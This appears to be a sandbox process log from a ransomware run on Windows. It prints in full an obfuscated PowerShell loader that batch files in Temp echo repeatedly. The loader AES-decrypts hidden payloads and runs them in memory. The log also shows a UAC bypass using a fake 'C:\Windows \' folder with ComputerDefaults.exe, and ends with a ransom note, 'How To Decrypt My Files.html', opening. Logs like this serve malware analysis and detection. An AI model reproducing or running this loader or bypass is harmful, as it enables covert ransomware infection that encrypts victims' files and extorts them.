C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ready.bat" "

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZPwGCBOvjNusELqY76pxZya0Lxj9wUHStDWXWQq3VFQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ikdb8NRfiUQc/X8n0b8K3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $husQJ=New-Object System.IO.MemoryStream(,$param_var); $fctrX=New-Object System.IO.MemoryStream; $IaCEh=New-Object System.IO.Compression.GZipStream($husQJ, [IO.Compression.CompressionMode]::Decompress); $IaCEh.CopyTo($fctrX); $IaCEh.Dispose(); $husQJ.Dispose(); $fctrX.Dispose(); $fctrX.ToArray();}function execute_function($param_var,$param2_var){ $cGlFM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SXWwD=$cGlFM.EntryPoint; $SXWwD.Invoke($null, $param2_var);}$YwUMr = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $YwUMr;$WBMie=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($YwUMr).Split([Environment]::NewLine);foreach ($yUchE in $WBMie) { if ($yUchE.StartsWith('eVpVeEttJiyVxTcVIRdA')) { $wGYAw=$yUchE.Substring(20); break; }}$payloads_var=[string[]]$wGYAw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7pfv3IC7ad/h9x9L+91yRp6AnehvA4v4FJcPUx3O2HY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X+cU4l/F7fG8+16o5SCDLA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $IlaQt=New-Object System.IO.MemoryStream(,$param_var); $Ybcnm=New-Object System.IO.MemoryStream; $Evfbh=New-Object System.IO.Compression.GZipStream($IlaQt, [IO.Compression.CompressionMode]::Decompress); $Evfbh.CopyTo($Ybcnm); $Evfbh.Dispose(); $IlaQt.Dispose(); $Ybcnm.Dispose(); $Ybcnm.ToArray();}function execute_function($param_var,$param2_var){ $QSfby=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TSQnj=$QSfby.EntryPoint; $TSQnj.Invoke($null, $param2_var);}$kvOlG = 'C:\Users\Admin\AppData\Local\Temp\Crypt.bat';$host.UI.RawUI.WindowTitle = $kvOlG;$pTJta=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kvOlG).Split([Environment]::NewLine);foreach ($oFaKJ in $pTJta) { if ($oFaKJ.StartsWith('ZkqIwJCzcVBaEdxxLCQj')) { $xIiOP=$oFaKJ.Substring(20); break; }}$payloads_var=[string[]]$xIiOP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e8muxl44QzFpbnkCrjQK7MgY3wLigHlewOA/sTi7P3M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xIHx7sG5Sgt6SDumHCsJWA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $anPTb=New-Object System.IO.MemoryStream(,$param_var); $dMvJM=New-Object System.IO.MemoryStream; $JXFgn=New-Object System.IO.Compression.GZipStream($anPTb, [IO.Compression.CompressionMode]::Decompress); $JXFgn.CopyTo($dMvJM); $JXFgn.Dispose(); $anPTb.Dispose(); $dMvJM.Dispose(); $dMvJM.ToArray();}function execute_function($param_var,$param2_var){ $GfJaX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $aDspK=$GfJaX.EntryPoint; $aDspK.Invoke($null, $param2_var);}$uyftC = 'C:\Users\Admin\AppData\Local\Temp\Ready.bat';$host.UI.RawUI.WindowTitle = $uyftC;$JWePL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uyftC).Split([Environment]::NewLine);foreach ($ynrHu in $JWePL) { if ($ynrHu.StartsWith('hcYJWCkzLwgEbRimAuGK')) { $ygbIC=$ynrHu.Substring(20); break; }}$payloads_var=[string[]]$ygbIC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"

C:\Windows \System32\ComputerDefaults.exe

"C:\Windows \System32\ComputerDefaults.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c call SC.cmd

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e8muxl44QzFpbnkCrjQK7MgY3wLigHlewOA/sTi7P3M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xIHx7sG5Sgt6SDumHCsJWA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $anPTb=New-Object System.IO.MemoryStream(,$param_var); $dMvJM=New-Object System.IO.MemoryStream; $JXFgn=New-Object System.IO.Compression.GZipStream($anPTb, [IO.Compression.CompressionMode]::Decompress); $JXFgn.CopyTo($dMvJM); $JXFgn.Dispose(); $anPTb.Dispose(); $dMvJM.Dispose(); $dMvJM.ToArray();}function execute_function($param_var,$param2_var){ $GfJaX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $aDspK=$GfJaX.EntryPoint; $aDspK.Invoke($null, $param2_var);}$uyftC = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $uyftC;$JWePL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uyftC).Split([Environment]::NewLine);foreach ($ynrHu in $JWePL) { if ($ynrHu.StartsWith('hcYJWCkzLwgEbRimAuGK')) { $ygbIC=$ynrHu.Substring(20); break; }}$payloads_var=[string[]]$ygbIC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Zero.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Lion.bat" "

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZPwGCBOvjNusELqY76pxZya0Lxj9wUHStDWXWQq3VFQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ikdb8NRfiUQc/X8n0b8K3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $husQJ=New-Object System.IO.MemoryStream(,$param_var); $fctrX=New-Object System.IO.MemoryStream; $IaCEh=New-Object System.IO.Compression.GZipStream($husQJ, [IO.Compression.CompressionMode]::Decompress); $IaCEh.CopyTo($fctrX); $IaCEh.Dispose(); $husQJ.Dispose(); $fctrX.Dispose(); $fctrX.ToArray();}function execute_function($param_var,$param2_var){ $cGlFM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SXWwD=$cGlFM.EntryPoint; $SXWwD.Invoke($null, $param2_var);}$YwUMr = 'C:\Users\Admin\AppData\Local\Temp\Zero.bat';$host.UI.RawUI.WindowTitle = $YwUMr;$WBMie=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($YwUMr).Split([Environment]::NewLine);foreach ($yUchE in $WBMie) { if ($yUchE.StartsWith('eVpVeEttJiyVxTcVIRdA')) { $wGYAw=$yUchE.Substring(20); break; }}$payloads_var=[string[]]$wGYAw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1YnbLPNeUNVUVVxywIOo7MRePVU0zkaX0wmvOUU+5JI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('O1ZS4QT3iZbBumFZuklvIw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NszaK=New-Object System.IO.MemoryStream(,$param_var); $XeHtF=New-Object System.IO.MemoryStream; $IjqXl=New-Object System.IO.Compression.GZipStream($NszaK, [IO.Compression.CompressionMode]::Decompress); $IjqXl.CopyTo($XeHtF); $IjqXl.Dispose(); $NszaK.Dispose(); $XeHtF.Dispose(); $XeHtF.ToArray();}function execute_function($param_var,$param2_var){ $qIrXR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TSbzU=$qIrXR.EntryPoint; $TSbzU.Invoke($null, $param2_var);}$DsdCu = 'C:\Users\Admin\AppData\Local\Temp\Lion.bat';$host.UI.RawUI.WindowTitle = $DsdCu;$ogPYs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DsdCu).Split([Environment]::NewLine);foreach ($EVBrb in $ogPYs) { if ($EVBrb.StartsWith('amSrAwxpqNlmSpytGMiD')) { $WsuQP=$EVBrb.Substring(20); break; }}$payloads_var=[string[]]$WsuQP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"

C:\Windows \System32\ComputerDefaults.exe

"C:\Windows \System32\ComputerDefaults.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c call SC.cmd

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZPwGCBOvjNusELqY76pxZya0Lxj9wUHStDWXWQq3VFQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ikdb8NRfiUQc/X8n0b8K3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $husQJ=New-Object System.IO.MemoryStream(,$param_var); $fctrX=New-Object System.IO.MemoryStream; $IaCEh=New-Object System.IO.Compression.GZipStream($husQJ, [IO.Compression.CompressionMode]::Decompress); $IaCEh.CopyTo($fctrX); $IaCEh.Dispose(); $husQJ.Dispose(); $fctrX.Dispose(); $fctrX.ToArray();}function execute_function($param_var,$param2_var){ $cGlFM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SXWwD=$cGlFM.EntryPoint; $SXWwD.Invoke($null, $param2_var);}$YwUMr = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $YwUMr;$WBMie=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($YwUMr).Split([Environment]::NewLine);foreach ($yUchE in $WBMie) { if ($yUchE.StartsWith('eVpVeEttJiyVxTcVIRdA')) { $wGYAw=$yUchE.Substring(20); break; }}$payloads_var=[string[]]$wGYAw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Zero.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Lion.bat" "

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZPwGCBOvjNusELqY76pxZya0Lxj9wUHStDWXWQq3VFQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ikdb8NRfiUQc/X8n0b8K3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $husQJ=New-Object System.IO.MemoryStream(,$param_var); $fctrX=New-Object System.IO.MemoryStream; $IaCEh=New-Object System.IO.Compression.GZipStream($husQJ, [IO.Compression.CompressionMode]::Decompress); $IaCEh.CopyTo($fctrX); $IaCEh.Dispose(); $husQJ.Dispose(); $fctrX.Dispose(); $fctrX.ToArray();}function execute_function($param_var,$param2_var){ $cGlFM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SXWwD=$cGlFM.EntryPoint; $SXWwD.Invoke($null, $param2_var);}$YwUMr = 'C:\Users\Admin\AppData\Local\Temp\Zero.bat';$host.UI.RawUI.WindowTitle = $YwUMr;$WBMie=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($YwUMr).Split([Environment]::NewLine);foreach ($yUchE in $WBMie) { if ($yUchE.StartsWith('eVpVeEttJiyVxTcVIRdA')) { $wGYAw=$yUchE.Substring(20); break; }}$payloads_var=[string[]]$wGYAw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1YnbLPNeUNVUVVxywIOo7MRePVU0zkaX0wmvOUU+5JI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('O1ZS4QT3iZbBumFZuklvIw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NszaK=New-Object System.IO.MemoryStream(,$param_var); $XeHtF=New-Object System.IO.MemoryStream; $IjqXl=New-Object System.IO.Compression.GZipStream($NszaK, [IO.Compression.CompressionMode]::Decompress); $IjqXl.CopyTo($XeHtF); $IjqXl.Dispose(); $NszaK.Dispose(); $XeHtF.Dispose(); $XeHtF.ToArray();}function execute_function($param_var,$param2_var){ $qIrXR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TSbzU=$qIrXR.EntryPoint; $TSbzU.Invoke($null, $param2_var);}$DsdCu = 'C:\Users\Admin\AppData\Local\Temp\Lion.bat';$host.UI.RawUI.WindowTitle = $DsdCu;$ogPYs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DsdCu).Split([Environment]::NewLine);foreach ($EVBrb in $ogPYs) { if ($EVBrb.StartsWith('amSrAwxpqNlmSpytGMiD')) { $WsuQP=$EVBrb.Substring(20); break; }}$payloads_var=[string[]]$WsuQP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"

C:\Windows \System32\ComputerDefaults.exe

"C:\Windows \System32\ComputerDefaults.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c call SC.cmd

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1YnbLPNeUNVUVVxywIOo7MRePVU0zkaX0wmvOUU+5JI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('O1ZS4QT3iZbBumFZuklvIw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NszaK=New-Object System.IO.MemoryStream(,$param_var); $XeHtF=New-Object System.IO.MemoryStream; $IjqXl=New-Object System.IO.Compression.GZipStream($NszaK, [IO.Compression.CompressionMode]::Decompress); $IjqXl.CopyTo($XeHtF); $IjqXl.Dispose(); $NszaK.Dispose(); $XeHtF.Dispose(); $XeHtF.ToArray();}function execute_function($param_var,$param2_var){ $qIrXR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TSbzU=$qIrXR.EntryPoint; $TSbzU.Invoke($null, $param2_var);}$DsdCu = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $DsdCu;$ogPYs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DsdCu).Split([Environment]::NewLine);foreach ($EVBrb in $ogPYs) { if ($EVBrb.StartsWith('amSrAwxpqNlmSpytGMiD')) { $WsuQP=$EVBrb.Substring(20); break; }}$payloads_var=[string[]]$WsuQP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff84c203cb8,0x7ff84c203cc8,0x7ff84c203cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6688 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

